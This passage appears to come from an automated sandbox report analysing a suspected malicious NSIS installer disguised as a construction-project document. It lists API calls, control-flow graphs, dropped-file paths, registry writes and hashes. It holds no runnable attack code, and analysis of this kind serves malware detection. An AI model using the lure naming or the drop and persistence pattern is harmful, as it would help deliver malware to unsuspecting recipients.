                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                                                          • Null, xrefs: 00402EB5
                                                                                                                          • "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe", xrefs: 00402DC5
                                                                                                                          • Error launching installer, xrefs: 00402E0C
                                                                                                                          • C:\Users\user\Desktop, xrefs: 00402E17, 00402E1C, 00402E22
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC9, 00402F94
                                                                                                                          • Inst, xrefs: 00402EA3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                          • String ID: "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft

                                                                                                                          APIs
                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\incontemptible\koput\Losser,?,?,00000031), ref: 00401793
                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\incontemptible\koput\Losser,?,?,00000031), ref: 004017B8
                                                                                                                            • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                            • Part of subcall function 00405234: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000), ref: 0040528F
                                                                                                                            • Part of subcall function 00405234: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll), ref: 004052A1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nszA07E.tmp$C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll$C:\Users\user\AppData\Roaming\incontemptible\koput\Losser$Call

                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                          • lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000), ref: 0040528F
                                                                                                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll), ref: 004052A1
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll

                                                                                                                          APIs
                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nszA07E.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nszA07E.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                                                          • WriteFile.KERNELBASE(00000000,?,C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                          • String ID: 8$C:\Users\user\AppData\Local\Temp\nszA07E.tmp$C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll

                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402616
                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402639
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040264F
                                                                                                                            • Part of subcall function 00405C7B: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C8F
                                                                                                                            • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                                          • String ID: 9

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 685 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 692 4029c7-4029d6 685->692 693 40237d-402385 685->693 695 402387-402394 call 402b3a lstrlenW 693->695 696 402398-40239b 693->696 695->696 699 4023ab-4023ae 696->699 700 40239d-4023aa call 402b1d 696->700 701 4023b0-4023ba call 403062 699->701 702 4023bf-4023d3 RegSetValueExW 699->702 700->699 701->702 707 4023d5 702->707 708 4023d8-4024b2 RegCloseKey 702->708 707->708 708->692 710 402793-40279a 708->710 710->692
                                                                                                                          APIs
                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nszA07E.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nszA07E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nszA07E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nszA07E.tmp
                                                                                                                          • API String ID: 1356686001-4192434616

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 711 4015b9-4015cd call 402b3a call 405a82 716 401614-401617 711->716 717 4015cf-4015eb call 405a04 CreateDirectoryW 711->717 718 401646-402197 call 401423 716->718 719 401619-401638 call 401423 call 405f8c SetCurrentDirectoryW 716->719 724 40160a-401612 717->724 725 4015ed-4015f8 GetLastError 717->725 732 402793-40279a 718->732 733 4029c7-4029d6 718->733 719->733 736 40163e-401641 719->736 724->716 724->717 728 401607 725->728 729 4015fa-401605 GetFileAttributesW 725->729 728->724 729->724 729->728 732->733 736->733
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,00405AF6,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,74DF2EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 00405A90
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405A95
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405AAD
                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 004015E3
                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015ED
                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 004015FD
                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\incontemptible\koput\Losser,?,00000000,?), ref: 00401630
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Roaming\incontemptible\koput\Losser, xrefs: 00401623
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\incontemptible\koput\Losser
                                                                                                                          • API String ID: 3751793516-1365608561

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 738 402b7a-402ba3 RegOpenKeyExW 739 402ba5-402bb0 738->739 740 402c0e-402c12 738->740 741 402bcb-402bdb RegEnumKeyW 739->741 742 402bb2-402bb5 741->742 743 402bdd-402bef RegCloseKey call 4062f6 741->743 745 402c02-402c05 RegCloseKey 742->745 746 402bb7-402bc9 call 402b7a 742->746 750 402bf1-402c00 743->750 751 402c15-402c1b 743->751 748 402c0b-402c0d 745->748 746->741 746->743 748->740 750->740 751->748 753 402c1d-402c2b RegDeleteKeyW 751->753 753->748 755 402c2d 753->755 755->740
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1912718029-0

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 756 10001759-10001795 call 10001b18 760 100018a6-100018a8 756->760 761 1000179b-1000179f 756->761 762 100017a1-100017a7 call 10002286 761->762 763 100017a8-100017b5 call 100022d0 761->763 762->763 768 100017e5-100017ec 763->768 769 100017b7-100017bc 763->769 770 1000180c-10001810 768->770 771 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 768->771 772 100017d7-100017da 769->772 773 100017be-100017bf 769->773 774 10001812-1000184c call 100015b4 call 100024a9 770->774 775 1000184e-10001854 call 100024a9 770->775 797 10001855-10001859 771->797 772->768 776 100017dc-100017dd call 10002b5f 772->776 778 100017c1-100017c2 773->778 779 100017c7-100017c8 call 100028a4 773->779 774->797 775->797 791 100017e2 776->791 780 100017c4-100017c5 778->780 781 100017cf-100017d5 call 10002645 778->781 788 100017cd 779->788 780->768 780->779 796 100017e4 781->796 788->791 791->796 796->768 800 10001896-1000189d 797->800 801 1000185b-10001869 call 1000246c 797->801 800->760 803 1000189f-100018a0 GlobalFree 800->803 806 10001881-10001888 801->806 807 1000186b-1000186e 801->807 803->760 806->800 809 1000188a-10001895 call 1000153d 806->809 807->806 808 10001870-10001878 807->808 808->806 810 1000187a-1000187b FreeLibrary 808->810 809->800 810->806
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(?,00001020), ref: 100022B8
                                                                                                                            • Part of subcall function 10002645: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1791698881-3916222277
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00405C45
                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C60
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                          • API String ID: 1716503409-678247507
                                                                                                                          • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                                          • Instruction ID: 7ad1723431e3bc490b0335289974808f62bfc0c3cb5a7c029972da154e4cc245
                                                                                                                          • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                                          • Instruction Fuzzy Hash: B9F09676604308BBEB009F59DC45E9BB7A8EB91710F10803AEA00E7140E2B0AD548B54
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                                                                                            • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                                          • WriteFile.KERNELBASE(0040BE90,0040E2D5,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                                          • SetFilePointer.KERNELBASE(0018B977,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Pointer$CountTickWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2146148272-0
                                                                                                                          • Opcode ID: dd796cccabb6a84ac49973fb4d75d79188a42d38f0e762117ceda5c208fcbf67
                                                                                                                          • Instruction ID: 5e1569cfb0b545446f3df2febc41285ecf4c3109a81fe664ff5153a665b75745
                                                                                                                          • Opcode Fuzzy Hash: dd796cccabb6a84ac49973fb4d75d79188a42d38f0e762117ceda5c208fcbf67
                                                                                                                          • Instruction Fuzzy Hash: D9418B72504205DFDB109F29EE84AA63BADF74431671441BFE605B22E1C7B96D418BAC
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405739
                                                                                                                          Strings
                                                                                                                          • Error launching installer, xrefs: 00405716
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                          • String ID: Error launching installer
                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                          • Opcode ID: 89d61fbbff7ca59509715ff9813e48ed7354dff71edc3a11a34e7e31b27a8334
                                                                                                                          • Instruction ID: 68da1b5efeb229702bef63955ccdeefd44cba6198d5a5f20aa9a51b41b675f94
                                                                                                                          • Opcode Fuzzy Hash: 89d61fbbff7ca59509715ff9813e48ed7354dff71edc3a11a34e7e31b27a8334
                                                                                                                          • Instruction Fuzzy Hash: 59E0BFB4A0420ABFFB109F64EC49F7B766CE710704F808521BD15F2250D7B4AC108A79
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 00406283
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 00406297
                                                                                                                            • Part of subcall function 00406220: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 004062AA
                                                                                                                          • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 00403347
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 4115351271-517883005
                                                                                                                          • Opcode ID: 39a545118ff9827536aa834da4382a8a1ba00f0c03fbe255a403a3aa64501383
                                                                                                                          • Instruction ID: c6abd0214a64de7cadaa734fac41eb8380666afbcf661e8bafaab08763a3f1d5
                                                                                                                          • Opcode Fuzzy Hash: 39a545118ff9827536aa834da4382a8a1ba00f0c03fbe255a403a3aa64501383
                                                                                                                          • Instruction Fuzzy Hash: 37D0522210A93130C84136663E02BCF080CCF0A32AF22807BF804B00C1CB3C1A8208FE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fbba942c1d572bf921735f4c6026e3062a5fb5b34c07d0b910559572d6fe18fe
                                                                                                                          • Instruction ID: 341b99abf03f2e1941eb6220a2ba2fa20bbc036e9949a5bf9c2c078605d2769f
                                                                                                                          • Opcode Fuzzy Hash: fbba942c1d572bf921735f4c6026e3062a5fb5b34c07d0b910559572d6fe18fe
                                                                                                                          • Instruction Fuzzy Hash: 9DA13471E00229DBDB28CFA8C8547ADBBB1FF48305F11816AD856BB281C7785A96CF44
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9b416045f54723c0aced5ed7493083a206bc2f8aaa63c3fa24b1832e5229f487
                                                                                                                          • Instruction ID: b24004e2459b3715c883c1996b24246953ff0fb47fcdf85fedfa1614f6e92f62
                                                                                                                          • Opcode Fuzzy Hash: 9b416045f54723c0aced5ed7493083a206bc2f8aaa63c3fa24b1832e5229f487
                                                                                                                          • Instruction Fuzzy Hash: 60911270E00228DBDF28CF98C854BADBBB1FF44305F15816AD856BB291C7789996CF44
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d1d8e67d3672fe33e56554ed692c604aaa9ef945de69a5b70ae3e54f11edcfbe
                                                                                                                          • Instruction ID: 0c07c17b414ad8f17a3ff3e8587382d040bd297e960d91c66a6d9af6720fecf2
                                                                                                                          • Opcode Fuzzy Hash: d1d8e67d3672fe33e56554ed692c604aaa9ef945de69a5b70ae3e54f11edcfbe
                                                                                                                          • Instruction Fuzzy Hash: 38815571D00228DFDF24CFA8C844BADBBB1FB44305F25816AD456BB291C7389A96CF54
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                          • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                                          Similarity
                                                                                                                          • API ID: File$PointerWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 539440098-0
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 00401FC3
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                            • Part of subcall function 00405234: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000), ref: 0040528F
                                                                                                                            • Part of subcall function 00405234: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll), ref: 004052A1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 00401FD4
                                                                                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 00402051
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 334405425-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405BD3: GetFileAttributesW.KERNELBASE(?,?,004057D8,?,?,00000000,004059AE,?,?,?,?), ref: 00405BD8
                                                                                                                            • Part of subcall function 00405BD3: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405BEC
                                                                                                                          • RemoveDirectoryW.KERNEL32(?,?,?,00000000,004059AE), ref: 004057E7
                                                                                                                          • DeleteFileW.KERNELBASE(?,?,?,00000000,004059AE), ref: 004057EF
                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405807
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1655745494-0
                                                                                                                          • Opcode ID: 149232c8aad9f1b3775c6dd716a29c2aaafc945b621f2dfd4840630b3c941ba6
                                                                                                                          • Instruction ID: bd6d4a3e3c8ae2539ca812546755b4e3e529903dede2fe37ad8455e2da4e9ad8
                                                                                                                          • Opcode Fuzzy Hash: 149232c8aad9f1b3775c6dd716a29c2aaafc945b621f2dfd4840630b3c941ba6
                                                                                                                          • Instruction Fuzzy Hash: D4E02B3250DA9096C35067349C08B5F3AD8DF86314F14493AFD52F21D0E37855469ABF
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000002F6,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nszA07E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
